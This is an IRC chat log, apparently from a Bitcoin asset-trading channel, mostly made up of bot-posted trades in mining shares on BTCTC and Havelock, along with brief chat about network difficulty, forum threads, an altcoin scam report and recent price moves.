[ASICMINER-PT] 1 @ 4.507 BTC [-] Jul 29 02:09:24 [BTCTC] [ASICMINER-PT] 2 @ 4.506 = 9.012 BTC [-] Jul 29 02:09:25 [BTCTC] [ASICMINER-PT] 3 @ 4.501 = 13.503 BTC [-] Jul 29 02:09:38 [BTCTC] [ASICMINER-PT] 4 @ 4.5 = 18 BTC [-] Jul 29 02:09:49 [BTCTC] [ACTIVEMINING] 113 @ 0.00785 = 0.8871 BTC [-] Jul 29 02:09:51 [BTCTC] [ASICMINER-PT] 2 @ 4.5 = 9 BTC [-] Jul 29 02:09:53 [BTCTC] [ACTIVEMINING] 187 @ 0.0078 = 1.4586 BTC [-] Jul 29 02:11:05 [HAVELOCK] [AM100] 5 @ 0.0428101 = 0.2141 BTC [+] Jul 29 02:11:10 [HAVELOCK] [AM100] 11 @ 0.0428101 = 0.4709 BTC [+] Jul 29 02:12:36 [HAVELOCK] [AM100] 120 @ 0.04281 = 5.1372 BTC [-] Jul 29 02:12:52 https://bitcointalk.org/index.php?topic=263627.0 Jul 29 02:12:54 eloel Jul 29 02:12:59 MtGOX WTF is going on? Jul 29 02:14:50 [BTCTC] [ACTIVEMINING] 1 @ 0.007873 BTC [+] Jul 29 02:15:05 [BTCTC] [ACTIVEMINING] 300 @ 0.00787 = 2.361 BTC [-] Jul 29 02:15:38 [BTCTC] [ACTIVEMINING] 1 @ 0.007801 BTC [-] Jul 29 02:15:39 [BTCTC] [ACTIVEMINING] 265 @ 0.0078 = 2.067 BTC [-] Jul 29 02:16:17 [BTCTC] [ACTIVEMINING] 1 @ 0.007873 BTC [+] Jul 29 02:17:24 [HAVELOCK] [SDSTM] 85 @ 0.00981 = 0.8339 BTC [-] Jul 29 02:17:32 [HAVELOCK] [SDSTM] 693 @ 0.0098 = 6.7914 BTC [-] Jul 29 02:17:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.04321 BTC [+] Jul 29 02:19:15 [HAVELOCK] [SDSTM] 5 @ 0.00955 = 0.0478 BTC [-] Jul 29 02:19:24 [HAVELOCK] [SDSTM] 22 @ 0.00955 = 0.2101 BTC [-] Jul 29 02:19:35 [HAVELOCK] [SDSTM] 5 @ 0.0095 = 0.0475 BTC [-] Jul 29 02:19:38 [HAVELOCK] [SDSTM] 2 @ 0.0095 = 0.019 BTC [-] Jul 29 02:19:51 [HAVELOCK] [SDSTM] 2 @ 0.00948898 = 0.019 BTC [-] Jul 29 02:20:28 [HAVELOCK] [SDSTM] 5 @ 0.0094 = 0.047 BTC [-] Jul 29 02:20:43 [HAVELOCK] [SDSTM] 5 @ 0.0092 = 0.046 BTC [-] Jul 29 02:20:44 [BTCTC] [ACTIVEMINING] 1 @ 0.00785 BTC [-] Jul 29 02:21:11 "I'm excited to announce the first 100TH hashpower is online. Tytus has his test rig running into the mine now, and has officially kicked off the ASIC mining season for 100TH!" Jul 29 02:21:14 [BTCTC] [ASICMINER-PT] 4 @ 4.478 = 17.912 BTC [-] Jul 29 02:21:16 [BTCTC] [ASICMINER-PT] 4 @ 4.47 = 17.88 BTC [-] Jul 29 02:21:46 [HAVELOCK] [SDSTM] 5 @ 0.00914 = 0.0457 BTC [-] Jul 29 02:22:01 [HAVELOCK] [SDSTM] 5 @ 0.009 = 0.045 BTC [-] Jul 29 02:22:26 [HAVELOCK] [SDSTM] 10 @ 0.008855 = 0.0886 BTC [-] Jul 29 02:22:28 ;;bc,diff Jul 29 02:22:29 Error: "bc,diff" is not a valid command. Jul 29 02:22:31 gah Jul 29 02:22:41 [HAVELOCK] [SDSTM] 5 @ 0.0088 = 0.044 BTC [-] Jul 29 02:22:51 ;;bcstats Jul 29 02:22:54 Current Blocks: 248956 | Current Difficulty: 3.125696072776893E7 | Next Difficulty At Block: 249983 | Next Difficulty In: 1027 blocks | Next Difficulty In About: 5 days, 22 hours, 28 minutes, and 26 seconds | Next Difficulty Estimate: 34509933.857 | Estimated Percent Change: 10.4072 Jul 29 02:22:57 [BTCTC] [ACTIVEMINING] 1 @ 0.007869 BTC [+] Jul 29 02:23:16 ;;nethash Jul 29 02:23:17 270815.517719 Jul 29 02:23:24 [BTCTC] [ASICMINER-PT] 1 @ 4.47 BTC [-] Jul 29 02:23:26 [BTCTC] [ASICMINER-PT] 1 @ 4.465 BTC [-] Jul 29 02:23:28 [BTCTC] [ASICMINER-PT] 1 @ 4.465 BTC [-] Jul 29 02:23:29 [BTCTC] [ASICMINER-PT] 3 @ 4.451 = 13.353 BTC [-] Jul 29 02:23:31 [BTCTC] [ASICMINER-PT] 2 @ 4.45 = 8.9 BTC [-] Jul 29 02:23:41 [HAVELOCK] [AM100] 109 @ 0.0430002 = 4.687 BTC [+] Jul 29 02:23:58 [BTCTC] [ACTIVEMINING] 1 @ 0.007869 BTC [+] Jul 29 02:23:59 [HAVELOCK] [AM100] 89 @ 0.0430003 = 3.827 BTC [+] Jul 29 02:27:46 [BTCTC] [ACTIVEMINING] 57 @ 0.007869 = 0.4485 BTC [+] Jul 29 02:29:56 [HAVELOCK] [SDSTM] 25 @ 0.0087 = 0.2175 BTC [-] Jul 29 02:30:02 [HAVELOCK] [SDSTM] 5 @ 0.0088 = 0.044 BTC [+] Jul 29 02:31:09 <[\\\]> mircea_popescu, where was that? Jul 29 02:31:14 [HAVELOCK] [SMG] 65 @ 0.00027 = 0.0176 BTC [+] Jul 29 02:31:36 [HAVELOCK] [AM100] 1 @ 0.0428501 BTC [-] Jul 29 02:32:00 [HAVELOCK] [HIM] 2 @ 0.18100042 = 0.362 BTC [-] Jul 29 02:32:03 https://bitcointalk.org/index.php?topic=263569.msg2819689#msg2819689 best post of bitcointalk Jul 29 02:32:06 pankkake parseval pizzaman1337 Populus PsychoticBoy publio Pucilowski Jul 29 02:32:07 pankkake parseval pizzaman1337 Populus PsychoticBoy publio Pucilowski Jul 29 02:32:08 shares offer in new business Jul 29 02:32:12 [\\\] in their dedicatged thread one sec. Jul 29 02:32:16 [HAVELOCK] [KCIM] 1 @ 0.830025 BTC [-] Jul 29 02:32:35 [HAVELOCK] [SDSTM] 5 @ 0.008651 = 0.0433 BTC [-] Jul 29 02:32:50 https://bitcointalk.org/index.php?topic=140366.msg2811496#msg2811496 Jul 29 02:32:56 [PicoStocks] 100TH/s bitcoin mine [100th] Jul 29 02:33:01 [HAVELOCK] [VTX] 1 @ 0.49 BTC [-] Jul 29 02:33:06 which one? "he was the hawtest thing around"? Jul 29 02:33:22 jurov no the physical satoshi Jul 29 02:33:25 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003347 BTC [+] Jul 29 02:33:56 (^^) Jul 29 02:33:56 [HAVELOCK] [VTX] 3 @ 0.49 = 1.47 BTC [-] Jul 29 02:34:22 <[\\\]> no, the TH quote Jul 29 02:34:45 <[\\\]> sorry, missed the second link Jul 29 02:34:55 [HAVELOCK] [HIM] 4 @ 0.18100001 = 0.724 BTC [-] Jul 29 02:35:02 [HAVELOCK] [HIM] 4 @ 0.18000003 = 0.72 BTC [-] Jul 29 02:35:04 <[\\\]> there's something to be said about having streaming quotes /not/ in a conversational channel Jul 29 02:35:18 [HAVELOCK] [SDSTM] 4 @ 0.00865 = 0.0346 BTC [-] Jul 29 02:35:32 [HAVELOCK] [SDSTM] 1 @ 0.0087 BTC [+] Jul 29 02:36:07 i think something like TAT.100TH was conceived already Jul 29 02:36:17 don't worry Jul 29 02:36:34 [\\\] what'd that be ? Jul 29 02:37:33 [BTCTC] [S.MPOE-PT] 18 @ 0.0009457 = 0.017 BTC [+] Jul 29 02:38:13 <[\\\]> mircea_popescu, as in not have assbot in here, but in #bitcoin-assets-ticker or some such Jul 29 02:38:21 <[\\\]> then our conversation is less meddled with quotes Jul 29 02:38:33 i don't see the upside Jul 29 02:38:46 i mean you can ignore it like you can ignore tiberius. problem solved. Jul 29 02:38:47 <[\\\]> of course not Jul 29 02:39:01 hehe Jul 29 02:39:04 [BTCTC] [ASICMINER-PT] 2 @ 4.451 = 8.902 BTC [+] Jul 29 02:39:04 [\\\]: yes there is #bitcoin-assets-trades Jul 29 02:39:09 <[\\\]> the point is that they are two different datasets Jul 29 02:39:20 [BTCTC] [ASICMINER-PT] 4 @ 4.45 = 17.8 BTC [-] Jul 29 02:39:21 [BTCTC] [ASICMINER-PT] 1 @ 4.44 BTC [-] Jul 29 02:39:40 [BTCTC] [ACTIVEMINING] 10 @ 0.00787 = 0.0787 BTC [+] Jul 29 02:40:10 https://bitcointalk.org/index.php?topic=263994.0 Jul 29 02:40:15 [ANN] GAS Coin is dead and this is how r3wt scammed us and destroyed the coin Jul 29 02:40:28 ouch Jul 29 02:40:33 [\\\] in this sense tits and ass are two different datasets. Jul 29 02:40:45 [BTCTC] [ACTIVEMINING] 112 @ 0.00787 = 0.8814 BTC [+] Jul 29 02:40:47 [BTCTC] [ACTIVEMINING] 200 @ 0.007875 = 1.575 BTC [+] Jul 29 02:40:48 [BTCTC] [ACTIVEMINING] 688 @ 0.007899 = 5.4345 BTC [+] Jul 29 02:40:51 they just happen to go together real well. Jul 29 02:40:53 glad i wasn't mining that Jul 29 02:41:07 [HAVELOCK] [SDSTM] 8 @ 0.00856 = 0.0685 BTC [-] Jul 29 02:41:16 [HAVELOCK] [SDSTM] 90 @ 0.0085 = 0.765 BTC [-] Jul 29 02:41:32 [HAVELOCK] [SDSTM] 22 @ 0.0084 = 0.1848 BTC [-] Jul 29 02:41:40 [HAVELOCK] [SDSTM] 4 @ 0.0083112 = 0.0332 BTC [-] Jul 29 02:41:57 [HAVELOCK] [SDSTM] 51 @ 0.0080001 = 0.408 BTC [-] Jul 29 02:42:15 was it the Give A Shit coin ? Jul 29 02:42:34 [BTCTC] [COGNITIVE] 2 @ 0.5616 = 1.1232 BTC [-] Jul 29 02:42:43 [BTCTC] [ACTIVEMINING] 124 @ 0.007899 = 0.9795 BTC [+] Jul 29 02:42:54 [BTCTC] [ACTIVEMINING] 4 @ 0.007899 = 0.0316 BTC [+] Jul 29 02:43:19 [BTCTC] [ASICMINER-PT] 1 @ 4.421 BTC [-] Jul 29 02:43:20 <[\\\]> mircea_popescu, not quite. Jul 29 02:43:35 <[\\\]> regardless, links like gas coin are why I no longer read that forum Jul 29 02:43:54 <[\\\]> the human filter I've relied on to only highlight important threads has failed Jul 29 02:44:11 [BTCTC] [ACTIVEMINING] 665 @ 0.0079 = 5.2535 BTC [+] Jul 29 02:44:19 im sorry, i wasn't offering a professional grade service. im just highlighting the FUNNY Jul 29 02:44:22 i found primecoin on that forum, and now i'm happy :) Jul 29 02:44:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.04321 BTC [+] Jul 29 02:44:26 not the important. pay someone for that! Jul 29 02:44:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.04321 BTC [+] Jul 29 02:44:36 xpm on the day it was released i mean Jul 29 02:45:05 [HAVELOCK] [SDSTM] 3 @ 0.0078 = 0.0234 BTC [-] Jul 29 02:45:22 [HAVELOCK] [SDSTM] 2 @ 0.0079 = 0.0158 BTC [+] Jul 29 02:45:29 [BTCTC] [ACTIVEMINING] 10 @ 0.0079 = 0.079 BTC [+] Jul 29 02:45:55 [BTCTC] [ACTIVEMINING] 1 @ 0.0079 BTC [+] Jul 29 02:46:09 Tentacles on pussy action (Safe for work): http://i.imgur.com/hiLa1WW.gif Jul 29 02:46:56 [BTCTC] [TAT.VIRTUALMINE] 83 @ 0.003347 = 0.2778 BTC [+] Jul 29 02:47:00 ahahaha the moving backwards Jul 29 02:47:02 they do that too. Jul 29 02:47:57 It's just as funny as it is ineffective. Jul 29 02:48:26 [BTCTC] [TAT.ASICMINER] 2 @ 0.0432 = 0.0864 BTC [-] Jul 29 02:48:27 [BTCTC] [TAT.ASICMINER] 18 @ 0.04316 = 0.7769 BTC [-] Jul 29 02:48:29 [BTCTC] [TAT.ASICMINER] 30 @ 0.04315 = 1.2945 BTC [-] Jul 29 02:48:31 [BTCTC] [TAT.ASICMINER] 4 @ 0.04313 = 0.1725 BTC [-] Jul 29 02:49:13 [BTCTC] [ACTIVEMINING] 824 @ 0.0079 = 6.5096 BTC [+] Jul 29 02:49:54 [BTCTC] [ACTIVEMINING] 290 @ 0.00797 = 2.3113 BTC [+] Jul 29 02:50:21 [BTCTC] [ACTIVEMINING] 210 @ 0.00797 = 1.6737 BTC [+] Jul 29 02:50:23 [BTCTC] [ACTIVEMINING] 25 @ 0.00798 = 0.1995 BTC [+] Jul 29 02:50:25 [BTCTC] [ACTIVEMINING] 100 @ 0.007999 = 0.7999 BTC [+] Jul 29 02:50:27 [HAVELOCK] [SDSTM] 3 @ 0.0078 = 0.0234 BTC [-] Jul 29 02:50:29 [BTCTC] [ACTIVEMINING] 1244 @ 0.008 = 9.952 BTC [+] Jul 29 02:50:31 [BTCTC] [ACTIVEMINING] 617 @ 0.008 = 4.936 BTC [+] Jul 29 02:50:58 [BTCTC] [ACTIVEMINING] 383 @ 0.008 = 3.064 BTC [+] Jul 29 02:50:59 [BTCTC] [ACTIVEMINING] 217 @ 0.008 = 1.736 BTC [+] Jul 29 02:51:25 [BTCTC] [ACTIVEMINING] 1000 @ 0.008 = 8 BTC [+] Jul 29 02:52:35 [BTCTC] [ASICMINER-PT] 1 @ 4.421 BTC [-] Jul 29 02:52:37 [BTCTC] [ASICMINER-PT] 1 @ 4.421 BTC [-] Jul 29 02:52:40 [BTCTC] [ASICMINER-PT] 2 @ 4.42 = 8.84 BTC [-] Jul 29 02:52:42 [BTCTC] [ASICMINER-PT] 1 @ 4.42 BTC [-] Jul 29 02:52:44 [BTCTC] [ASICMINER-PT] 1 @ 4.42 BTC [-] Jul 29 02:52:48 [BTCTC] [ASICMINER-PT] 1 @ 4.41 BTC [-] Jul 29 02:52:52 [BTCTC] [ASICMINER-PT] 1 @ 4.41 BTC [-] Jul 29 02:52:55 [BTCTC] [ASICMINER-PT] 3 @ 4.41 = 13.23 BTC [-] Jul 29 02:52:59 [BTCTC] [ASICMINER-PT] 2 @ 4.403 = 8.806 BTC [-] Jul 29 02:53:01 [BTCTC] [ASICMINER-PT] 1 @ 4.402 BTC [-] Jul 29 02:53:04 [BTCTC] [ASICMINER-PT] 2 @ 4.402 = 8.804 BTC [-] Jul 29 02:53:09 [BTCTC] [ASICMINER-PT] 3 @ 4.401 = 13.203 BTC [-] Jul 29 02:53:20 [BTCTC] [ACTIVEMINING] 181 @ 0.008 = 1.448 BTC [+] Jul 29 02:54:17 [BTCTC] [ACTIVEMINING] 102 @ 0.008 = 0.816 BTC [+] Jul 29 02:54:18 [BTCTC] [ACTIVEMINING] 500 @ 0.008001 = 4.0005 BTC [+] Jul 29 02:54:20 [BTCTC] [ACTIVEMINING] 398 @ 0.0081 = 3.2238 BTC [+] Jul 29 02:55:25 [BTCTC] [ACTIVEMINING] 602 @ 0.0081 = 4.8762 BTC [+] Jul 29 02:55:27 [BTCTC] [ACTIVEMINING] 50 @ 0.0082 = 0.41 BTC [+] Jul 29 02:55:30 [BTCTC] [ACTIVEMINING] 500 @ 0.008499 = 4.2495 BTC [+] Jul 29 02:55:32 [BTCTC] [ACTIVEMINING] 500 @ 0.008499 = 4.2495 BTC [+] Jul 29 02:55:52 [BTCTC] [ACTIVEMINING] 1348 @ 0.0085 = 11.458 BTC [+] Jul 29 02:56:19 Damn alrdy Jul 29 02:56:45 [BTCTC] [ACTIVEMINING] 100 @ 0.0085 = 0.85 BTC [+] Jul 29 02:57:53 damn, wish i didn't sell yesterday :\ Jul 29 02:58:36 lmao Jul 29 02:58:53 [BTCTC] [ACTIVEMINING] 1000 @ 0.0085 = 8.5 BTC [+] Jul 29 02:59:38 [HAVELOCK] [SMG] 2 @ 0.00027 = 0.0005 BTC [+] Jul 29 02:59:59 I'm not sure which is the saddest, that I didn't buy at IPO to sell right now, or that people actually buy ActiveMining that high. Jul 29 03:00:27 [BTCTC] [ACTIVEMINING] 52 @ 0.0085 = 0.442 BTC [+] Jul 29 03:01:31 [BTCTC] [ASICMINER-PT] 7 @ 4.401 = 30.807 BTC [-] Jul 29 03:01:33 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [-] Jul 29 03:01:37 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [-] Jul 29 03:01:38 i'll tell you what's saddest : that people continue to refuse to make the scam/business distinction in the hopes of landing some fraction of a bitcoin Jul 29 03:01:39 [BTCTC] [ASICMINER-PT] 8 @ 4.4 = 35.2 BTC [-] Jul 29 03:01:39 [BTCTC] [ACTIVEMINING] 1 @ 0.0086 BTC [+] Jul 29 03:01:53 but then again it's both unavoidable and finite so what can you do. Jul 29 03:01:58 [BTCTC] [ASICMINER-PT] 7 @ 4.4 = 30.8 BTC [-] Jul 29 03:02:24 [BTCTC] [ACTIVEMINING] 75 @ 0.0085 = 0.6375 BTC [-] Jul 29 03:02:26 [BTCTC] [ACTIVEMINING] 25 @ 0.008203 = 0.2051 BTC [-] Jul 29 03:02:28 [BTCTC] [ACTIVEMINING] 500 @ 0.008202 = 4.101 BTC [-] Jul 29 03:03:08 [BTCTC] [ACTIVEMINING] 25 @ 0.008599 = 0.215 BTC [+] Jul 29 03:03:10 [BTCTC] [ACTIVEMINING] 99 @ 0.0086 = 0.8514 BTC [+] Jul 29 03:03:12 [BTCTC] [ACTIVEMINING] 100 @ 0.00865 = 0.865 BTC [+] Jul 29 03:03:14 [BTCTC] [ACTIVEMINING] 8 @ 0.008958 = 0.0717 BTC [+] Jul 29 03:03:15 [BTCTC] [ACTIVEMINING] 1500 @ 0.00898 = 13.47 BTC [+] Jul 29 03:03:17 [BTCTC] [ACTIVEMINING] 500 @ 0.008999 = 4.4995 BTC [+] Jul 29 03:03:20 [BTCTC] [ACTIVEMINING] 1000 @ 0.008999 = 8.999 BTC [+] Jul 29 03:03:22 [BTCTC] [ACTIVEMINING] 50 @ 0.009 = 0.45 BTC [+] Jul 29 03:03:23 [BTCTC] [ACTIVEMINING] 150 @ 0.009 = 1.35 BTC [+] Jul 29 03:03:25 [BTCTC] [ACTIVEMINING] 300 @ 0.009 = 2.7 BTC [+] Jul 29 03:03:26 [BTCTC] [ACTIVEMINING] 1500 @ 0.009 = 13.5 BTC [+] Jul 29 03:03:27 [BTCTC] [ACTIVEMINING] 268 @ 0.009 = 2.412 BTC [+] Jul 29 03:04:06 [BTCTC] [ACTIVEMINING] 420 @ 0.00897 = 3.7674 BTC [-] Jul 29 03:04:07 [BTCTC] [TAT.ASICMINER] 28 @ 0.04307 = 1.206 BTC [-] Jul 29 03:04:29 [BTCTC] [ASICMINER-PT] 2 @ 4.4 = 8.8 BTC [-] Jul 29 03:04:42 [BTCTC] [BASIC-MINING] 1 @ 0.515 BTC [-] Jul 29 03:05:27 [BTCTC] [ACTIVEMINING] 30 @ 0.008999 = 0.27 BTC [+] Jul 29 03:06:41 [BTCTC] [ACTIVEMINING] 470 @ 0.008999 = 4.2295 BTC [+] Jul 29 03:07:30 [BTCTC] [ACTIVEMINING] 2 @ 0.009 = 0.018 BTC [+] Jul 29 03:07:36 [BTCTC] [ACTIVEMINING] 150 @ 0.009 = 1.35 BTC [+] Jul 29 03:07:57 [BTCTC] [BASIC-MINING] 4 @ 0.5149 = 2.0596 BTC [-] Jul 29 03:08:01 [BTCTC] [BASIC-MINING] 1 @ 0.514 BTC [-] Jul 29 03:08:03 [BTCTC] [BASIC-MINING] 3 @ 0.508 = 1.524 BTC [-] Jul 29 03:08:21 [BTCTC] [DMS.SELLING] 47 @ 0.02125 = 0.9988 BTC [+] Jul 29 03:08:23 [BTCTC] [DMS.SELLING] 20 @ 0.02125 = 0.425 BTC [+] Jul 29 03:08:44 [BTCTC] [DMS.SELLING] 26 @ 0.02127 = 0.553 BTC [+] Jul 29 03:08:54 [HAVELOCK] [SDSTM] 2 @ 0.008055 = 0.0161 BTC [+] Jul 29 03:09:10 [BTCTC] [DMS.SELLING] 121 @ 0.02128 = 2.5749 BTC [+] Jul 29 03:09:26 [BTCTC] [ACTIVEMINING] 504 @ 0.008999 = 4.5355 BTC [-] Jul 29 03:09:29 [BTCTC] [DMS.SELLING] 50 @ 0.02146 = 1.073 BTC [+] Jul 29 03:10:29 [BTCTC] [DMS.SELLING] 87 @ 0.02147 = 1.8679 BTC [+] Jul 29 03:10:31 [BTCTC] [DMS.SELLING] 18 @ 0.02147 = 0.3865 BTC [+] Jul 29 03:10:33 [BTCTC] [DMS.SELLING] 7 @ 0.02147 = 0.1503 BTC [+] Jul 29 03:10:52 [BTCTC] [ACTIVEMINING] 150 @ 0.009 = 1.35 BTC [+] Jul 29 03:14:35 [BTCTC] [ACTIVEMINING] 25 @ 0.008228 = 0.2057 BTC [-] Jul 29 03:16:23 [BTCTC] [ACTIVEMINING] 25 @ 0.008501 = 0.2125 BTC [+] Jul 29 03:16:25 [BTCTC] [ACTIVEMINING] 43 @ 0.0085 = 0.3655 BTC [-] Jul 29 03:16:41 [BTCTC] [ACTIVEMINING] 13 @ 0.008899 = 0.1157 BTC [+] Jul 29 03:18:10 [BTCTC] [ACTIVEMINING] 25 @ 0.008503 = 0.2126 BTC [-] Jul 29 03:18:29 [BTCTC] [ACTIVEMINING] 87 @ 0.008502 = 0.7397 BTC [-] Jul 29 03:19:14 [BTCTC] [ASICMINER-PT] 1 @ 4.41 BTC [+] Jul 29 03:19:16 [BTCTC] [ASICMINER-PT] 16 @ 4.4 = 70.4 BTC [-] Jul 29 03:19:18 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [-] Jul 29 03:19:29 [BTCTC] [ACTIVEMINING] 25 @ 0.008505 = 0.2126 BTC [+] Jul 29 03:19:31 [BTCTC] [ACTIVEMINING] 1 @ 0.008504 BTC [-] Jul 29 03:19:33 [BTCTC] [ACTIVEMINING] 529 @ 0.008502 = 4.4976 BTC [-] Jul 29 03:19:43 [BTCTC] [ACTIVEMINING] 50 @ 0.008501 = 0.4251 BTC [-] Jul 29 03:19:45 [BTCTC] [ACTIVEMINING] 1195 @ 0.0085 = 10.1575 BTC [-] Jul 29 03:20:15 [HAVELOCK] [AM100] 2 @ 0.0428502 = 0.0857 BTC [+] Jul 29 03:20:55 [BTCTC] [ACTIVEMINING] 3 @ 0.008501 = 0.0255 BTC [+] Jul 29 03:21:30 [BTCTC] [ACTIVEMINING] 27 @ 0.008231 = 0.2222 BTC [-] Jul 29 03:21:31 [BTCTC] [ACTIVEMINING] 500 @ 0.008 = 4 BTC [-] Jul 29 03:21:51 [BTCTC] [ACTIVEMINING] 50 @ 0.008232 = 0.4116 BTC [+] Jul 29 03:25:01 [BTCTC] [ASICMINER-PT] 2 @ 4.4 = 8.8 BTC [-] Jul 29 03:25:04 [BTCTC] [ASICMINER-PT] 7 @ 4.36 = 30.52 BTC [-] Jul 29 03:25:20 [BTCTC] [ASICMINER-PT] 1 @ 4.35 BTC [-] Jul 29 03:25:23 [BTCTC] [ASICMINER-PT] 3 @ 4.35 = 13.05 BTC [-] Jul 29 03:25:26 [BTCTC] [ASICMINER-PT] 2 @ 4.35 = 8.7 BTC [-] Jul 29 03:25:29 [BTCTC] [ASICMINER-PT] 2 @ 4.35 = 8.7 BTC [-] Jul 29 03:25:31 [BTCTC] [ASICMINER-PT] 5 @ 4.33 = 21.65 BTC [-] Jul 29 03:25:34 [BTCTC] [ASICMINER-PT] 1 @ 4.32 BTC [-] Jul 29 03:25:36 [BTCTC] [ASICMINER-PT] 3 @ 4.32 = 12.96 BTC [-] Jul 29 03:25:37 [BTCTC] [ASICMINER-PT] 6 @ 4.32 = 25.92 BTC [-] Jul 29 03:25:40 [BTCTC] [ASICMINER-PT] 2 @ 4.31 = 8.62 BTC [-] Jul 29 03:25:44 [BTCTC] [COGNITIVE] 1 @ 0.5627 BTC [+] Jul 29 03:25:45 [BTCTC] [ASICMINER-PT] 2 @ 4.3 = 8.6 BTC [-] Jul 29 03:25:47 [BTCTC] [COGNITIVE] 2 @ 0.5626 = 1.1252 BTC [-] Jul 29 03:25:48 [BTCTC] [ASICMINER-PT] 3 @ 4.29 = 12.87 BTC [-] Jul 29 03:25:50 [BTCTC] [ASICMINER-PT] 4 @ 4.272 = 17.088 BTC [-] Jul 29 03:25:52 [BTCTC] [ASICMINER-PT] 3 @ 4.271 = 12.813 BTC [-] Jul 29 03:25:54 [BTCTC] [ASICMINER-PT] 6 @ 4.267 = 25.602 BTC [-] Jul 29 03:25:56 [BTCTC] [ASICMINER-PT] 3 @ 4.267 = 12.801 BTC [-] Jul 29 03:26:02 [BTCTC] [ASICMINER-PT] 5 @ 4.266 = 21.33 BTC [-] Jul 29 03:26:04 [BTCTC] [ASICMINER-PT] 2 @ 4.264 = 8.528 BTC [-] Jul 29 03:26:06 [BTCTC] [ASICMINER-PT] 5 @ 4.262 = 21.31 BTC [-] Jul 29 03:26:15 [BTCTC] [COGNITIVE] 1 @ 0.5626 BTC [-] Jul 29 03:26:16 [BTCTC] [ASICMINER-PT] 1 @ 4.252 BTC [-] Jul 29 03:26:18 [BTCTC] [ASICMINER-PT] 2 @ 4.251 = 8.502 BTC [-] Jul 29 03:26:20 [BTCTC] [ASICMINER-PT] 10 @ 4.25 = 42.5 BTC [-] Jul 29 03:26:23 [BTCTC] [ASICMINER-PT] 2 @ 4.25 = 8.5 BTC [-] Jul 29 03:26:27 [BTCTC] [ASICMINER-PT] 4 @ 4.235 = 16.94 BTC [-] Jul 29 03:26:29 [BTCTC] [ASICMINER-PT] 8 @ 4.222 = 33.776 BTC [-] Jul 29 03:26:41 [BTCTC] [ASICMINER-PT] 6 @ 4.221 = 25.326 BTC [-] Jul 29 03:26:42 [BTCTC] [ASICMINER-PT] 2 @ 4.221 = 8.442 BTC [-] Jul 29 03:26:44 [BTCTC] [ASICMINER-PT] 2 @ 4.211 = 8.422 BTC [-] Jul 29 03:26:46 [BTCTC] [ASICMINER-PT] 1 @ 4.21 BTC [-] Jul 29 03:26:48 [BTCTC] [ASICMINER-PT] 2 @ 4.208 = 8.416 BTC [-] Jul 29 03:26:50 [BTCTC] [ASICMINER-PT] 5 @ 4.201 = 21.005 BTC [-] Jul 29 03:26:52 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [-] Jul 29 03:26:54 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [-] Jul 29 03:26:56 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [-] Jul 29 03:26:59 [BTCTC] [ASICMINER-PT] 2 @ 4.2 = 8.4 BTC [-] Jul 29 03:27:29 usagi Jul 29 03:27:31 er heh hes not here Jul 29 03:27:47 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [-] Jul 29 03:28:31 [BTCTC] [BASIC-MINING] 2 @ 0.509 = 1.018 BTC [+] Jul 29 03:28:34 [BTCTC] [BASIC-MINING] 3 @ 0.509 = 1.527 BTC [+] Jul 29 03:29:01 [BTCTC] [ASICMINER-PT] 1 @ 4.15 BTC [-] Jul 29 03:29:05 [BTCTC] [ASICMINER-PT] 1 @ 4.15 BTC [-] Jul 29 03:30:13 [HAVELOCK] [AM100] 106 @ 0.0428502 = 4.5421 BTC [+] Jul 29 03:30:38 [HAVELOCK] [AM100] 1 @ 0.04285011 BTC [-] Jul 29 03:30:44 [HAVELOCK] [AM100] 100 @ 0.04285 = 4.285 BTC [-] Jul 29 03:30:48 [HAVELOCK] [AM100] 3 @ 0.04281 = 0.1284 BTC [-] Jul 29 03:32:20 [BTCTC] [ACTIVEMINING] 1 @ 0.007902 BTC [-] Jul 29 03:32:56 [BTCTC] [BASIC-MINING] 2 @ 0.62 = 1.24 BTC [+] Jul 29 03:33:13 [BTCTC] [ACTIVEMINING] 25 @ 0.008496 = 0.2124 BTC [+] Jul 29 03:33:15 [BTCTC] [ACTIVEMINING] 95 @ 0.008497 = 0.8072 BTC [+] Jul 29 03:33:16 [BTCTC] [ACTIVEMINING] 50 @ 0.008499 = 0.425 BTC [+] Jul 29 03:33:17 [BTCTC] [ACTIVEMINING] 180 @ 0.0085 = 1.53 BTC [+] Jul 29 03:34:01 [BTCTC] [ACTIVEMINING] 25 @ 0.008499 = 0.2125 BTC [-] Jul 29 03:34:03 [BTCTC] [ACTIVEMINING] 320 @ 0.0085 = 2.72 BTC [+] Jul 29 03:35:25 [BTCTC] [ACTIVEMINING] 300 @ 0.008 = 2.4 BTC [-] Jul 29 03:35:38 [BTCTC] [ACTIVEMINING] 250 @ 0.008 = 2 BTC [-] Jul 29 03:35:43 [HAVELOCK] [HIM] 5 @ 0.19650001 = 0.9825 BTC [+] Jul 29 03:36:48 [BTCTC] [ACTIVEMINING] 25 @ 0.008514 = 0.2129 BTC [+] Jul 29 03:37:29 [BTCTC] [ACTIVEMINING] 25 @ 0.008514 = 0.2129 BTC [+] Jul 29 03:37:31 [BTCTC] [ACTIVEMINING] 10 @ 0.008515 = 0.0852 BTC [+] Jul 29 03:37:32 [BTCTC] [ACTIVEMINING] 4 @ 0.008545 = 0.0342 BTC [+] Jul 29 03:37:33 [BTCTC] [ACTIVEMINING] 1 @ 0.008547 BTC [+] Jul 29 03:37:36 [BTCTC] [ASICMINER-PT] 1 @ 4.38 BTC [+] Jul 29 03:38:43 [BTCTC] [ACTIVEMINING] 25 @ 0.008005 = 0.2001 BTC [-] Jul 29 03:38:58 [BTCTC] [ACTIVEMINING] 25 @ 0.008499 = 0.2125 BTC [+] Jul 29 03:39:00 [BTCTC] [ACTIVEMINING] 175 @ 0.0085 = 1.4875 BTC [+] Jul 29 03:39:13 [BTCTC] [ACTIVEMINING] 25 @ 0.008005 = 0.2001 BTC [-] Jul 29 03:39:51 [BTCTC] [TAT.VIRTUALMINE] 46 @ 0.003171 = 0.1459 BTC [-] Jul 29 03:40:19 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.00317 = 0.0063 BTC [-] Jul 29 